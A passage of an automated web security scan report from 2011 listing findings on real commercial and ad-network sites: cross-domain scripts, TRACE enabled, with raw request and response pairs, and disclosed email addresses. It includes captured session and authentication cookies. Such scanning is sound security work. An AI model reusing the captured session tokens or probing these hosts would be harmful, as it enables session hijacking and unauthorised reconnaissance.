Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

23.38. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

https://nexus2.ensighten.com/sony/Bootstrap.js

Request

Response

23.39. http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.telegraph.co.uk
Path:	/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://inskin.vo.llnwd.net/o21/ikit/default/js/inskin_load.js
http://js.revsci.net/gateway/gw.js?csid=E06560
http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html HTTP/1.1
Host: www.telegraph.co.uk
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=76009744.1305508777.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76009744.1214434362.1305508777.1305508777.1305508777.1; __utmc=76009744; __utmb=76009744.1.10.1305508777; rsi_segs=; WT_FPC=id=173.193.214.243-1374949008.30151527:lv=1305526811924:ss=1305526776991

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
ETag: 8509794-1305508644064
Vary: Accept-Encoding
Content-Language: en-GB
Cache-Control: max-age=307
Date: Mon, 16 May 2011 01:32:56 GMT
Content-Length: 47875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://inskin.vo.llnwd.net/o21/ikit/default/css/default.css" />
<script type="text/javascript" src="http://inskin.vo.llnwd.net/o21/ikit/default/js/inskin_load.js"></script>
...[SNIP]...
</style>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=E06560"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=telegraphmedia"></script>
...[SNIP]...

23.40. http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.telegraph.co.uk
Path:	/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://inskin.vo.llnwd.net/o21/ikit/default/js/inskin_load.js
http://js.revsci.net/gateway/gw.js?csid=E06560
http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html HTTP/1.1
Host: www.telegraph.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
ETag: 8509938-1305507621089
Vary: Accept-Encoding
Content-Language: en-GB
Cache-Control: max-age=83
Date: Mon, 16 May 2011 01:19:33 GMT
Content-Length: 44749
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://inskin.vo.llnwd.net/o21/ikit/default/css/default.css" />
<script type="text/javascript" src="http://inskin.vo.llnwd.net/o21/ikit/default/js/inskin_load.js"></script>
...[SNIP]...
</style>

<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=E06560"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=telegraphmedia"></script>
...[SNIP]...

23.41. http://www.viddler.com/file/7d63c65a/html5mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.viddler.com
Path:	/file/7d63c65a/html5mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://static.woopra.com/js/woopra.v2.js

Request

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.32
Date: Sun, 15 May 2011 20:26:39 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Viddler-Node: viddler_d
Vary: Accept-Encoding
Content-Length: 7614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

<script type="text/javascript" src="//static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...

24. TRACE method is enabled previous next
There are 17 instances of this issue:

http://ads.pubmatic.com/
http://bh.contextweb.com/
http://d.xp1.ru4.com/
http://image2.pubmatic.com/
http://imawow.weather.com/
http://login.dotomi.com/
http://optimized-by.rubiconproject.com/
http://pixel.rubiconproject.com/
http://r.openx.net/
http://secure-us.imrworldwide.com/
http://track.pubmatic.com/
http://travel.travelocity.com/
http://ts.istrack.com/
http://webassets.scea.com/
http://widgets.outbrain.com/
http://wow.weather.com/
http://www.magicalkingdoms.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

24.1. http://ads.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: 7f1f0508d037feb0

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Mon, 16 May 2011 01:19:46 GMT
Content-Type: message/http
Content-Length: 253
Expires: Mon, 16 May 2011 01:19:46 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: 7f1f0508d037feb0; PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubfreq_27159=; pubtime_27159=TMC; pubfreq_27159_22228_261216082=165-1; PMDTSHR=
_FP_X_URL: http://ads.pubmatic.com/

24.2. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: a98aafc5667f8040

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Content-Type: message/http
Content-Length: 237
Date: Mon, 16 May 2011 01:19:50 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: a98aafc5667f8040; V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; C2W4=CT-1; pb_rtb_ev=1:531292.AG-00000001389358554.0
connection: Keep-Alive
cw-userhostaddress: 173.193.214.243

24.3. http://d.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: c9b9f53ae1c05ac9

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:19:57 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: c9b9f53ae1c05ac9; X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; O179638=0; O65121=0; C66281=0@0; C90514=0@0

24.4. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: eae6eb792bf1132a

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:51 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: eae6eb792bf1132a; PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubfreq_27159=; pubtime_27159=TMC; pubfreq_27159_22228_261216082=165-1; PMDTSHR=; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-09035c0c-59c0-487
...[SNIP]...

24.5. http://imawow.weather.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imawow.weather.com
Path:	/

Request

TRACE / HTTP/1.0
Host: imawow.weather.com
Cookie: 6164854f224ea7a7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:59 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imawow.weather.com
Cookie: 6164854f224ea7a7
Connection: Keep-Alive
OAS_IP: 173.193.214.243

24.6. http://login.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 5edd645f7d0463e1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:38:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 5edd645f7d0463e1; Apache=173.193.214.243.1305509455494172

24.7. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: f7f92c4d4640034e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:48 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f7f92c4d4640034e; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySw
...[SNIP]...

24.8. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: e67d9fef3e7503b4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:54 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: e67d9fef3e7503b4; rpx=5671%3D11993%2C0%2C1%2C%2C; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f
...[SNIP]...

24.9. http://r.openx.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 89e45e552dcf487

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:26:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 89e45e552dcf487; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; p=1305468109
X-Forwarded-For: 173.193.214.243

24.10. http://secure-us.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 27418d398c333c08

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:30:58 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 27418d398c333c08; V5=AStfNgoZEVhWEhozMgAjIy0iMiIOEVInHlKgsw__; IMRID=TcmY74psGzoAADVzMls
Host: secure-us.imrworldwide.com

24.11. http://track.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: track.pubmatic.com
Cookie: 6ab64eda211982f4

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:23:17 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: track.pubmatic.com
Cookie: 6ab64eda211982f4; PUBMDCID=2; KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; pubfreq_27159=; pubtime_27159=TMC; pubfreq_27159_22228_261216082=165-1; PMDTSHR=; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-09035c0c-59c0-487
...[SNIP]...

24.12. http://travel.travelocity.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://travel.travelocity.com
Path:	/

Request

TRACE / HTTP/1.0
Host: travel.travelocity.com
Cookie: a51706f770142415

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:30:05 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: travel.travelocity.com
Cookie: a51706f770142415; JSESSIONID=C814B875E8532FEC5C454509AFA906A9.p0740; tyrg1st=B8AB98D19E7A2835; Service=TRAVELOCITY; SID=T000V00000X110515202012020911330728692; __utmz=1.1305508832.1.1.utmcsr=(direct)|utmccn=(direct)|u
...[SNIP]...

24.13. http://ts.istrack.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ts.istrack.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ts.istrack.com
Cookie: 8cfa5232c4b6df0f

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:33:22 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ts.istrack.com
Cookie: 8cfa5232c4b6df0f

24.14. http://webassets.scea.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webassets.scea.com
Path:	/

Request

TRACE / HTTP/1.0
Host: webassets.scea.com
Cookie: ddd89a3c40063b

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sun, 15 May 2011 20:27:00 GMT
Content-Type: message/http
Content-Length: 109
Expires: Sun, 15 May 2011 20:27:00 GMT
Connection: close

TRACE / HTTP/1.0
Host: webassets.scea.com
Cookie: ddd89a3c40063b
_FP_X_URL: http://webassets.scea.com/

24.15. http://widgets.outbrain.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.outbrain.com
Path:	/

Request

TRACE / HTTP/1.0
Host: widgets.outbrain.com
Cookie: 743127004332b5f6

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:45 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Cookie: 743127004332b5f6; obuid=8212382c-a920-4555-8b81-259021933018; _rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45; tick=1305508793921; _lvs2="uaMqgoSgWEtsUDbY+ohiLdTBMiCQRzqSyDZn+kvSOpk="; _lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPz
...[SNIP]...

24.16. http://wow.weather.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/

Request

TRACE / HTTP/1.0
Host: wow.weather.com
Cookie: 12e0f92996559dc5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wow.weather.com
Cookie: 12e0f92996559dc5
Connection: Keep-Alive
OAS_IP: 173.193.214.243

24.17. http://www.magicalkingdoms.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.magicalkingdoms.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.magicalkingdoms.com
Cookie: a4616a8c9f74b1a6

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:19:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.magicalkingdoms.com
Cookie: a4616a8c9f74b1a6; PHPSESSID=cf6190390f14fba80a77f4845931a480

25. Email addresses disclosed previous next
There are 35 instances of this issue:

http://blog.us.playstation.com/wp-content/themes/twenty11/js/facebox.js
http://disneycruise.disney.go.com/reservations/customize
http://i.usatoday.net/_common/_scripts/jquery.cookie.js
http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js
http://secureshopping.mcafee.com/
http://shop.pacsun.com/js_external/PS_external_validation.js
http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
http://static.bhphotovideo.com/FrameWork/js/common.js
http://static.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js
http://widgets.outbrain.com/OutbrainRater.js
http://www.acehardware.com/js/LIB_core.js
http://www.cruisecritic.com/js/global.js
http://www.fingerhut.com/js/jquery.cookie.js
https://www.fingerhut.com/js/jquery.cookie.js
http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js
http://www.guitarcenter.com/Includes/Guitarcenter/Guitarcenter.css
http://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js
http://www.magicalkingdoms.com/blog/category/disneyland-paris/
http://www.magicalkingdoms.com/blog/wp-content/plugins/jquery-colorbox/js/jquery.colorbox-min.js
https://www.mcafeesecure.com/us/legalinfo.jsp
http://www.passporterboards.com/forums/
http://www.petsmart.com/js/LIB_core.js
http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js
http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js
https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js
https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
http://www.telegraph.co.uk/template/ver1-0/js/jquery.tablesorter.js
http://www.travelguard.com/WorkArea/java/ektron.js
http://www.travelguard.com/tgi3/00common/js/tracking/s_code.js

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

25.1. http://blog.us.playstation.com/wp-content/themes/twenty11/js/facebox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.us.playstation.com
Path:	/wp-content/themes/twenty11/js/facebox.js

Issue detail

The following email address was disclosed in the response:

chris@ozmm.org

Request

GET /wp-content/themes/twenty11/js/facebox.js?ver=3.0.5 HTTP/1.1
Host: blog.us.playstation.com
Proxy-Connection: keep-alive
Referer: http://blog.us.playstation.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1305491253|session#1305491190457-245340#1305493053; APPLICATION_SITE_URL=http%3A//us.playstation.com/psn/; __utmz=1.1305491193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.170304013.1305491193.1305491193.1305491193.1; __utmc=1; __utmb=1.2.10.1305491193; __utmz=110009370.1305491197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=110009370.1768330900.1305491197.1305491197.1305491197.1; __utmc=110009370; __utmb=110009370.1.10.1305491197

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 20:26:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 14 Mar 2011 15:03:57 GMT
nnCoection: close
Expires: Thu, 16 Jun 2011 20:26:40 GMT
Cache-Control: max-age=2764800
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 9259

/*
* Facebox (for jQuery)
* version: 1.2 (05/05/2008)
* @requires jQuery v1.2 or later
*
* Examples at http://famspam.com/facebox/
*
* Licensed under the MIT:
* http://www.opensource.org/licenses/mit-license.php
*
* Copyright 2007, 2008 Chris Wanstrath [ chris@ozmm.org ]
*
* Usage:
*
* jQuery(document).ready(function() {
* jQuery('a[rel*=facebox]').facebox()
* })
*
* <a href="#terms" rel="facebox">
...[SNIP]...

25.2. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The following email address was disclosed in the response:

Goofy@disney.com

Request

Response

25.3. http://i.usatoday.net/_common/_scripts/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/_common/_scripts/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /_common/_scripts/jquery.cookie.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 10 May 2010 13:01:50 GMT
Accept-Ranges: bytes
ETag: "0b341f440f0ca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 3654
Date: Mon, 16 May 2011 01:19:44 GMT
Connection: close
Vary: Accept-Encoding

/*jslint browser: true */ /*global jQuery: true */

/**
* jQuery Cookie plugin
*
* Copyright (c) 2010 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opens
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

// key and value given, set cookie...
if (arguments.length >
...[SNIP]...

25.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.usatoday.net
Path:	/asp/uas3/uas.jquery.plugins.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /asp/uas3/uas.jquery.plugins.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:55:03 GMT
Accept-Ranges: bytes
ETag: "3d4f53c183f4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 20271
Date: Mon, 16 May 2011 01:20:33 GMT
Connection: close
Vary: Accept-Encoding

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function($,window){var defaults={transition:"elastic",speed:300,width:false,initialWidth:"600",innerWidth:false
...[SNIP]...

25.5. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
